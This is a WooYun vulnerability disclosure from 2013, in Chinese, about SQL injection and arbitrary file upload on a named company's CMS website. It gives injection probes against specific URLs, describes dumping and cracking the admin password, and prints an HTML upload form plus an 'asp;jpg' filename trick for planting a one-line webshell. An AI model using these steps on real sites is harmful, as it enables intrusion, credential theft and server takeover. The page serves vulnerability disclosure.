当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046291

漏洞标题:博时空间CMS官网SQL漏洞+任意文件上传漏洞

相关厂商:博时空间

漏洞作者: cheetah

提交时间:2013-12-19 16:51

修复时间:2014-03-19 16:51

公开时间:2014-03-19 16:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-19: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

1、博时空间CMS官网可以SQL注入,直接注出后台用户名和密码
2、存在上传漏洞,可以直接拿shell

详细说明:

1.SQL注入漏洞
手工检测博时空间官网
http://www.bjbskj.com/newsdetails.asp?id=468 and 1=1

.jpg


http://www.bjbskj.com/newsdetails.asp?id=468 and 1=2

.jpg


确定此页面存在注入漏洞。
用注入工具注入,得到admin表中的后台用户名和密码

.jpg


反查询md5得到密码,后台地址为http://www.bjbskj.com/admin/login.asp
登录

TM截图未命名.png


另外目测可以从后台配置获得一句话木马
2.w78eWebEditor
这是个老漏洞了,在这里赘述一下过程。

<form action="http://www.bjbskj.com/admin/w78eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=d.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>

上传一句话木马,文件名改为yijuhua.asp;xx.jpg
上传后查看源代码即可得到一句话木马的地址

漏洞证明:

.jpg

修复方案:

对提交内容进行过滤

版权声明:转载请注明来源 cheetah@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝